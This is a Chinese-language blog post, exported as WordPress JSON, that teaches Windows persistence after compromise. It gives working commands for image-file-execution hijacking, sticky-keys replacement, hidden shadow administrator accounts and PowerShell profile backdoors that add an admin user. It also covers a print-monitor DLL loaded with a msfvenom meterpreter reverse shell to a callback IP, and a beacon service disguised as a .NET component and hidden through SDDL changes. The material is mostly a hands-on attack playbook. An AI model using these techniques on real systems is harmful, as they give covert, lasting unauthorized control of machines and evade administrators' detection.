{"id":792,"date":"2025-10-24T15:33:30","date_gmt":"2025-10-24T07:33:30","guid":{"rendered":"https:\/\/www.youvii.site\/?p=792"},"modified":"2025-10-24T15:33:30","modified_gmt":"2025-10-24T07:33:30","slug":"windowsquanxianweichi","status":"publish","type":"post","link":"https:\/\/www.youvii.site\/index.php\/archives\/windowsquanxianweichi","title":{"rendered":"Windows\u6743\u9650\u7ef4\u6301"},"content":{"rendered":"<h1>Windows\u6743\u9650\u7ef4\u6301<\/h1>\n<h1>php \u4e0d\u6b7b\u9a6c\u6743\u9650\u7ef4\u6301<\/h1>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">&lt;?php\nignore_user_abort(); \/\/\u5173\u6389\u6d4f\u89c8\u5668\uff0cPHP\u811a\u672c\u4e5f\u53ef\u4ee5\u7ee7\u7eed\u6267\u884c.\nset_time_limit(0);\/\/\u901a\u8fc7set_time_limit(0)\u53ef\u4ee5\u8ba9\u7a0b\u5e8f\u65e0\u9650\u5236\u7684\u6267\u884c\u4e0b\u53bb\n$interval = 5; \/\/ \u6bcf\u9694*\u79d2\u8fd0\u884c\ndo {\n$filename = 'test.php';\nif(file_exists($filename)) {\necho \"xxx\";\n}\nelse {\n$file = fopen(\"test.php\", \"w\");\n$txt = \"&lt;?php phpinfo();?&gt;n\";\nfwrite($file, $txt);\nfclose($file);\n}\nsleep($interval);\n} while (true);\n?&gt;<\/code><\/pre>\n<h1>\u6620\u50cf\u52ab\u6301\u6280\u672f<\/h1>\n<p>\u6ce8\u518c\u8868<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImage File\nExecution Options<\/code><\/pre>\n<p>\u5728\u4e0b\u9762\u6dfb\u52a0\u4e00\u9879\uff0c\u8fd9\u91cc\u7684\u547d\u540d\u4e0e\u540e\u7eed\u8981\u89e6\u53d1\u7684\u53ef\u6267\u884c\u6587\u4ef6\u7a0b\u5e8f\u6587\u4ef6\u540d\u4e00\u81f4\uff0c\u8fd9\u91cc\u6211\u65b0\u5efa\u4e86\u4e00\u4e2amoon.exe<\/p>\n<p>\u7136\u540e\u5728moon.exe\u7684\u53f3\u4fa7\u65b0\u5efa\u4e00\u4e2aDebugger\uff0c\u5728\u8f93\u5165\u503c\u7684\u680f\u76ee\u4e2d\u586b\u5165\u4f60\u7684\u540e\u95e8\u7edd\u5bf9\u8def\u5f84\uff0c\u6211\u8fd9\u91cc\u4ee5cmd.exe\u4e3a\u4f8b<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae44b347d7.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609089916-cb156f71-4ef0-4482-b2f1-6596b2440e00.png\" \/><\/p>\n<p>\u5728\u684c\u9762 \u4fee\u6539\u4e00\u4e2a\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3amoon.exe \u53cc\u51fb \u5373\u53ef\u89e6\u53d1<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae44d88a47.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609094705-10686948-5b74-4160-bb96-f687bdfd9697.png\" \/>\u5982\u679c\u60f3\u5199\u5165\u540e\u95e8 \u628a \u8def\u5f84\u6362\u6210\u4f60\u540e\u95e8\u5730\u5740\u5373\u53ef<\/p>\n<h1>\u7b56\u7565\u7ec4\u811a\u672c\u7ef4\u6301<\/h1>\n<p>\u8f93\u5165gpedit.msc \u6253\u5f00\u7ec4\u7b56\u7565\uff0c\u6253\u5f00 windows\u8bbe\u7f6e \u811a\u672c \u91cc\u9762\u53c8\u5173\u673a\u548c\u5f00\u673a<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45037298.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609117595-ec622ef7-4f0b-4659-a79c-58c57260536d.png\" \/><\/p>\n<p>\u5728<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">C:WindowsSystem32GroupPolicyMachineScriptsStartup<\/code><\/pre>\n<p>\u65b0\u5efa1.bat<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">@echo off\nsysteminfo &gt;1.txt<\/code><\/pre>\n<p>\u542f\u52a8\u65f6 \u9009\u62e9\u8be5\u811a\u672c\u6587\u4ef6\u5373\u53ef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45248fe8.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609146969-d547986f-6793-484e-80a8-eff1978cccc5.png\" \/><\/p>\n<p>\u91cd\u542f\u540e<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae454c243f.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609155004-059375cd-25f4-4bfa-8fb6-011eefb8ccc6.png\" \/><\/p>\n<h1>shift\u540e\u95e8<\/h1>\n<p>\u6309\u7740shift\u4e94\u4e0b \u4f1a\u5f39\u51fa<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4579730b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609175098-41083b90-cd11-438a-bbc1-fba90c228959.png\" \/><\/p>\n<p>\u9996\u5148 \u66f4\u6539sethc.exe\u62e5\u6709\u8005 \u4e3aadministrator<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">move C:windowssystem32sethc.exe C:windowssystem32sethc.exe.bak\nCopy C:windowssystem32cmd.exe C:windowssystem32sethc.exe<\/code><\/pre>\n<p>\u63a5\u7740 cmd\u6539\u540d\u66ff\u6362 sethc.exe<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\".\/img\/NAEPrXYB_bbiSqvM\/1746609194221-0abae3a7-96c8-4ee4-9841-1f9ae25599d5-062603.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609194221-0abae3a7-96c8-4ee4-9841-1f9ae25599d5.png\" \/><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45a39564.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609196994-bb354658-f688-4777-be75-84b1ae5c1100.png\" \/><\/p>\n<h1>\u5efa\u7acb\u5f71\u5b50\u8d26\u53f7<\/h1>\n<p>\u901a\u5e38\u5728\u62ff\u5230\u670d\u52a1\u5668\u540e\u4f1a\u521b\u5efa\u4e00\u4e2a\u5e26$\u7b26\u53f7\u7684\u8d26\u6237\uff0c\u56e0\u4e3a\u5728\u5e38\u89c4cmd\u4e0b\u662f\u65e0\u6cd5\u67e5\u770b\u5230\u7684<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45c8d8ec.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609208393-d50269ed-1733-4a1a-95a7-08a788e484d6.png\" \/><\/p>\n<p>\u901a\u8fc7\u7ba1\u7406\u7528\u6237\u53ef\u67e5\u5230\u7528\u6237<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae45f22da5.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609217489-908521c8-5ebd-4648-bedc-270fb32b1693.png\" \/><\/p>\n<p>\u901a\u8fc7\u521b\u5efa\u5f71\u5b50\u8d26\u6237\u5219\u53ef\u4ee5\u5b8c\u5168\u89e3\u51b3\u8fd9\u79cd\u95ee\u9898\u3002<\/p>\n<p>\u6253\u5f00\u6ce8\u518c\u8868 HEKY_LOCAL_MACHINESAMSAMDomainsAccountUser<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae461e3c2b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609223336-9f1e6d81-43e9-4007-a88f-1fab585f8598.png\" \/><\/p>\n<p>3ea\u662fmoonsec$\u7528\u6237 1F4\u662f\u8d85\u7ea7\u7ba1\u7406\u5458\u7684\u503c<\/p>\n<p>\u5c061F4\u4e0bF\u9879\u7684\u503c\u590d\u5236\u52303ea\u4e0bF\u9879\u91cc\u9762\uff0c\u66ff\u6362\u539f\u6709\u6570\u636e\u3002\u7136\u540e\u5bfc\u51famoonsec$\u4ee5\u53ca3EB\u3002<\/p>\n<p>\u5220\u9664 ner user moonsec$ \/del \u5220\u9664\u8fd9\u4e2a\u7528\u6237 \u518d\u5bfc\u5165\u6ce8\u518c\u8868 \u53ef\u4ee5\u770b\u5230 \u7528\u6237\u5df2\u7ecf\u4e0d\u73b0\u5b9e\u5728\u8fd9\u4e2a\u9762\u677f\u4e86<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4644ab64.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609243107-7c7eaff1-37f5-430a-b4cd-46140372aae0.png\" \/><\/p>\n<p>\u7528moonsec$\u767b\u5f55\u8fdc\u7a0b\u7ec8\u7aef<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae466a55bf.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609250644-d4834654-b07d-4130-be0e-6eebf2f40a15.png\" \/><\/p>\n<h1>powershell\u914d\u7f6e\u6587\u4ef6\u540e\u95e8<\/h1>\n<p>Powershell\u914d\u7f6e\u6587\u4ef6\u5176\u5b9e\u5c31\u662f\u4e00\u4e2apowershell\u811a\u672c\uff0c\u4ed6\u53ef\u4ee5\u5728\u6bcf\u6b21\u8fd0\u884cpowershell\u7684\u65f6\u5019\u81ea\u52a8\u8fd0\u884c\uff0c\u6240\u4ee5\u53ef\u4ee5\u901a\u8fc7\u5411\u8be5\u6587\u4ef6\u5199\u5165\u81ea\u5b9a\u4e49\u7684\u8bed\u53e5\u7528\u6765\u957f\u671f\u7ef4\u6301\u6743\u9650<\/p>\n<p>\u4f9d\u6b21\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4\uff0c\u67e5\u770b\u5f53\u524d\u662f\u5426\u5b58\u5728\u914d\u7f6e\u6587\u4ef6<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">echo $profile\nTest-path $profile<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4698c457.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609275446-15c1e298-ad3b-4e2f-b00e-8870d6f5d496.png\" \/><\/p>\n<p>\u5982\u679c\u8fd4\u56defalse\u5219\u9700\u8981\u521b\u5efa\u4e00\u4e2a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">New-Item -Path $profile -Type File \u2013Force<\/code><\/pre>\n<p>\u7136\u540e\u5199\u5165\u547d\u4ee4\uff0c\u8fd9\u91cc\u6211\u4ee5\u521b\u5efa\u4e00\u4e2a\u7528\u6237\u4e3a\u76ee\u6807\uff0c\u4e5f\u53ef\u4ee5\u5199\u6210\u53cd\u5f39shell\u7684\uff0c\u56e0\u4e3a\u4e4b\u524d\u6d4b\u8bd5\u8fc7\u7a0b\u4e2d\u5199\u5165\u8fc7\u6570\u636e\uff0c\u6240\u4ee5\u8fd9\u91cc\u6211\u662f\u4e09\u6761\u5185\u5bb9<\/p>\n<p>1\u3001bat \u5185\u5bb9<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">net user moon 123456 \/add &amp; net localgroup administrators moon \/add<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684C:1.bat\u662f\u6211\u7684\u540e\u95e8\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5b9e\u6218\u60c5\u51b5\u4e0b\uff0c\u5404\u4f4d\u9700\u8981\u6309\u7167\u5b9e\u9645\u6587\u4ef6\u8def\u5f84\u6765\u4fee\u6539<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">$string = 'Start-Process \"C:1.bat\"'\n$string | Out-File -FilePath $profile -Append\nmore $profile<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae46c62b4a.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609379942-38016b24-7b44-45aa-ac15-aff975a128c5.png\" \/><\/p>\n<p>\u91cd\u65b0\u6253\u5f00powershell\u5c31\u4f1a\u81ea\u52a8\u6267\u884c<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae46e7a7b3.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609386691-3bcd859b-c08e-436a-9e6d-34fd5adcf8d8.png\" \/><\/p>\n<h1>Monitor \u6743\u9650\u7ef4\u6301<\/h1>\n<p>\u9879\u76ee\u5730\u5740 <a href=\"https:\/\/github.com\/Al1ex\/Monitor\">https:\/\/github.com\/Al1ex\/Monitor<\/a><\/p>\n<p>\u9879\u76ee\u8bf4\u660e<\/p>\n<p>\u7528\u4e8e\u5b9e\u73b0\u540e\u6e17\u900f\u6d4b\u8bd5\u9636\u6bb5\u6743\u9650\u7ef4\u6301<\/p>\n<p>\u9879\u76ee\u4f7f\u7528<\/p>\n<p>Step1\uff1a\u4e0b\u8f7d\u8be5\u9879\u76ee\uff0c\u4e4b\u540e\u4f7f\u7528VS\u7f16\u8bd1Monitor.cpp\uff0c\u5f53\u7136\u4e5f\u53ef\u4ee5\u4f7f\u7528\u7f16\u8bd1\u597d\u7684\uff0cMonitor.cpp\u4ee3\u7801\u5982\u4e0b\u6240\u793a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">#include \"Windows.h\"\nint main() {\nMONITOR_INFO_2 monitorInfo;\nTCHAR env[12] = TEXT(\"Windows x64\");\nTCHAR name[12] = TEXT(\"Monitor\");\nTCHAR dll[12] = TEXT(\"test.dll\");\nmonitorInfo.pName = name;\nmonitorInfo.pEnvironment = env;\nmonitorInfo.pDLLName = dll;\nAddMonitor(NULL, 2, (LPBYTE)&amp;monitorInfo);\nreturn 0;\n}<\/code><\/pre>\n<p>pName \/\/\u76d1\u89c6\u5668\u540d\u79f0<\/p>\n<p>pEnvironment \/\/\u73af\u5883\u67b6\u6784<\/p>\n<p>pDLLName \/\/\u76d1\u89c6\u5668DLL\u6587\u4ef6\u7684\u540d\u79f0<\/p>\n<p>Step 2\uff1a\u4f7f\u7528Msfvenom\u751f\u6210dll\u653b\u51fb\u8f7d\u8377\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">msfvenom -p windows\/x64\/meterpreter\/reverse_tcp LHOST=192.168.188.129 LPORT=4444\n-f dll &gt; shell.dll<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae470b8274.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609441672-09102563-3ab9-42d2-ab3c-dc0f659b3472.png\" \/><\/p>\n<p>Step 3\uff1a\u5c06shell.dll\u590d\u5236\u5230\u76ee\u6807\u4e3b\u673a\u7684system32\u76ee\u5f55\u4e0b\uff0c\u4e4b\u540e\u91cd\u547d\u540d\u4e3atest.dll(\u4e5f\u5c31\u662f\u4e0a\u9762\u7684PDLLName\uff0c\u4f60\u4e5f\u53ef\u4ee5\u81ea\u5df1\u4fee\u6539\u4e3a\u81ea\u5df1\u559c\u6b22\u7684\uff0c\u603b\u4e4b\u968f\u610f)<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">copy C:tempshell.dll C:WindowsSystem32test.dll<\/code><\/pre>\n<p>\u4e4b\u540e\u8fdb\u5165system32\u76ee\u5f55\uff0c\u5e76\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4(Monitors.exe\u4e3a\u4e4b\u524d\u7f16\u8bd1\u597d\u7684\u6587\u4ef6\uff0c\u4e5f\u9700\u8981\u653e\u7f6e\u5230system32\u76ee\u5f55\u4e0b)\uff1a<\/p>\n<p>Step 4\uff1a\u4e4b\u540e\u8fdb\u5165system32\u76ee\u5f55\uff0c\u5e76\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4(Monitors.exe\u4e3a\u4e4b\u524d\u7f16\u8bd1\u597d\u7684\u6587\u4ef6\uff0c\u4e5f\u9700\u8981\u653e\u7f6e\u5230system32\u76ee\u5f55\u4e0b)\uff1a<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47383cec.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609472707-3fc25eb3-ffab-4b16-9e79-e1e459a09c0b.png\" \/><\/p>\n<p>Step 5\uff1a\u4e4b\u540e\u6210\u529f\u63a5\u6536\u5230Meterpreter\u4f1a\u8bdd<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae475ea555.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609479611-a9bc673d-f5cc-42c7-b314-17dd457a7b5d.png\" \/><\/p>\n<p>\u6301\u4e45\u5316\u5b9e\u73b0<\/p>\n<p>\u4e3a\u4e86\u5b9e\u73b0\u6301\u4e45\u6027\uff0c\u6211\u4eec\u9700\u8981\u5728&quot;Monitors&quot;\u6ce8\u518c\u8868\u4f4d\u7f6e\u4e0b\u8bbe\u7f6e\u4e00\u4e2akey:<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlPrintMonitors<\/code><\/pre>\n<p>\u4e4b\u540e\u5728\u547d\u4ee4\u884c\u4e0b\u6267\u884c\u4ee5\u4e0b\u547d\u4ee4\u521b\u5efa\u4e00\u4e2a\u6ce8\u518c\u8868\u9879\uff0c\u8be5\u6ce8\u518c\u8868\u9879\u5c06\u5305\u542b\u503ctest.dll\uff0c\u4ece\u7f16\u8f91\u5668\u4e2d\u67e5\u770b\u6ce8\u518c\u8868\u9a8c\u8bc1\u5bc6\u94a5\u662f\u5426\u5df2\u521b\u5efa\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">reg add \"hklmsystemcurrentcontrolsetcontrolprintmonitorsPentestlab\" \/v\n\"Driver\" \/d \"test.dll\" \/t REG_SZ<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4784c430.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609505498-2f5997ae-76d2-48ee-b0a4-5c925cb83baf.png\" \/><\/p>\n<p>\u4e0b\u6b21\u91cd\u65b0\u542f\u52a8\u65f6\uff0cspoolsv.exe\u8fdb\u7a0b\u5c06\u52a0\u8f7dMonitors\u6ce8\u518c\u8868\u9879\u4e2d\u5b58\u5728\u5e76\u5b58\u50a8\u5728Windows\u6587\u4ef6\u5939System32\u4e2d\u7684\u6240\u6709\u9a71\u52a8\u7a0b\u5e8fDLL\u6587\u4ef6<\/p>\n<p>\u4e0b\u56fe\u6f14\u793a\u4e86Meterpreter\u4f1a\u8bdd\u5df2\u5efa\u7acb\u4e0ePrint Spooler\u670d\u52a1(SYSTEM)\u76f8\u540c\u7ea7\u522b\u7684\u7279\u6743\uff0c\u5e76\u4e14\u5df2\u4eceSystem32\u6587\u4ef6\u5939\u6267\u884c\u4e86<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47a7524b.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609523607-28c53d2c-eaef-44e6-bf72-5bf23c5a6317.png\" \/><\/p>\n<h1>\u5229\u7528\u5b89\u5168\u63cf\u8ff0\u7b26\u9690\u85cf\u670d\u52a1\u540e\u95e8\u8fdb\u884c\u6743\u9650\u7ef4\u6301<\/h1>\n<p>\u901a\u8fc7\u6ce8\u518c\u670d\u52a1\u521b\u5efa\u540e\u95e8<\/p>\n<p>\u5c06\u540e\u95e8\u7a0b\u5e8f\u6ce8\u518c\u4e3a\u81ea\u542f\u52a8\u670d\u52a1\u662f\u6211\u4eec\u5e38\u7528\u7684\u4e00\u79cd\u8fdb\u884c\u6743\u9650\u7ef4\u6301\u7684\u65b9\u6cd5\uff0c\u901a\u5e38\u53ef\u4ee5\u901a\u8fc7sc\u6216\u8005powershell\u6765\u8fdb\u884c\u521b\u5efa\u3002<\/p>\n<p>cmd\u521b\u5efa\u81ea\u542f\u52a8\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc create \".NET CLR Networking 3.5.0.0\" binpath= \"cmd.exe \/k\nC:Usersadministratorbeacon.exe\" depend= Tcpip obj= Localsystem start= auto<\/code><\/pre>\n<p>powershell\u521b\u5efa\u81ea\u542f\u52a8\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">new-service \u2013Name \".NET CLR Networking 3.5.0.0\" \u2013DisplayName \".NET CLR Networking\n3.5.0.0\" \u2013BinaryPathName \"cmd.exe \/k C:Usersadministratorbeacon.exe\" \u2013\nStartupType AutomaticDelayedStart<\/code><\/pre>\n<p>\u4f46\u521b\u5efa\u7684\u670d\u52a1\u5f88\u5bb9\u6613\u88ab\u53d1\u73b0 \u901a\u8fc7 sc query \u548c Get-Service \u5f88\u5bb9\u6613\u53d1\u73b0\uff0c\u76f4\u63a5\u67e5\u8be2\u670d\u52a1\u4e5f\u80fd\u770b\u89c1<\/p>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47c975cc.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609558773-dd747cd9-5c14-43ea-9e8f-6acad9be73ed.png\" \/><\/p>\n<p>\u901a\u8fc7\u4fee\u6539SDDL(\u5b89\u5168\u63cf\u8ff0\u7b26)\u9690\u85cf\u670d\u52a1<\/p>\n<p>\u4f17\u6240\u5468\u77e5\uff0cwindows\u8bbf\u95ee\u63a7\u5236\u6a21\u578b\u5206\u4e3a\u4e24\u90e8\u5206\uff1a<\/p>\n<p>access token(\u8bbf\u95ee\u4ee4\u724c)<\/p>\n<p>\u5b89\u5168\u63cf\u8ff0\u7b26<\/p>\n<p>\u5b89\u5168\u63cf\u8ff0\u7b26\u5305\u542b\u4e0e\u5b89\u5168\u5bf9\u8c61\u5173\u8054\u7684\u5b89\u5168\u4fe1\u606f\u3002\u5b89\u5168\u63cf\u8ff0\u7b26\u5305\u542b\u5b89\u5168\u63cf\u8ff0\u7b26\u7ed3\u6784\u53ca\u5176\u5173\u8054\u7684\u5b89\u5168\u4fe1\u606f\u3002\u5b89<\/p>\n<p>\u5168\u63cf\u8ff0\u7b26\u53ef\u4ee5\u5305\u542b\u4ee5\u4e0b\u5b89\u5168\u4fe1\u606f\uff1a<\/p>\n<p>\u5bf9\u8c61\u7684\u6240\u6709\u8005\u548c\u4e3b\u8981\u7ec4\u7684 Sid\uff08\u5b89\u5168\u6807\u8bc6\u7b26\uff09<\/p>\n<p>\u7528\u4e8e\u6307\u5b9a\u5141\u8bb8\u6216\u62d2\u7edd\u7279\u5b9a\u7528\u6237\u6216\u7ec4\u7684\u8bbf\u95ee\u6743\u9650\u7684 DACL \u3002<\/p>\n<p>\u6307\u5b9a\u4e3a\u5bf9\u8c61\u751f\u6210\u5ba1\u6838\u8bb0\u5f55\u7684\u8bbf\u95ee\u5c1d\u8bd5\u7c7b\u578b\u7684 SACL \u3002<\/p>\n<p>\u4e00\u7ec4\u9650\u5236\u5b89\u5168\u63cf\u8ff0\u7b26\u6216\u5176\u5404\u4e2a\u6210\u5458\u7684\u542b\u4e49\u7684\u63a7\u5236\u4f4d\u3002<\/p>\n<p>windows\u4e2d\u7684\u5b89\u5168\u5bf9\u8c61\u90fd\u4f7f\u7528SDDL\u5b57\u7b26\u4e32\u6765\u8868\u793a\u8bbf\u95ee\u5bf9\u8c61\u5bf9\u4e8e\u5b89\u5168\u5bf9\u8c61\u7684\u6743\u9650\uff0c\u670d\u52a1\u81ea\u7136\u4e5f\u5b58\u5728\u5176SDDL\uff0c\u5e76\u4e14sc\u547d\u4ee4\u4e2d\u53ef\u4ee5\u8bbe\u7f6eSDDL\u3002\u90a3\u4e48\u901a\u8fc7\u66f4\u6539SDDL\u53ef\u4ee5\u4fee\u6539\u670d\u52a1\u7684\u5404\u79cd\u6743\u9650\u6765\u9690\u85cf\u670d\u52a1<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc sdset \".NET CLR Networking 3.5.0.0\" \"D:(D;;DCLCWPDTSD;;;IU)\n(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)\n(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)\n(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae47eeaf08.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609587118-f1fa18c4-c1dc-4de5-acb6-2dfcf8363f83.png\" \/><\/p>\n<p>\u7136\u540e\u901a\u8fc7sc\u4e0eget-server\u67e5\u627e\u670d\u52a1\u5747\u65e0\u7ed3\u679c\uff1a<\/p>\n<pre class=\"prettyprint linenums\" ><code class=\"language-basic\">sc query |findstr \".NET CLR Networking 3.5.0.0\"\nget-service | findstr \".NET CLR Networking 3.5.0.0\"<\/code><\/pre>\n<p><img loading="lazy" decoding="async" decoding=\"async\"  src=\"https:\/\/www.youvii.site\/wp-content\/themes\/lolimeow-lolimeowV13.13\/assets\/images\/loading.gif\" data-src=\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae4817c457.png\" class=\"lazy\" loading=\"lazy\" alt=\"1746609601579-fbd555c7-5124-419a-acf9-e52c44bb29c2.png\" 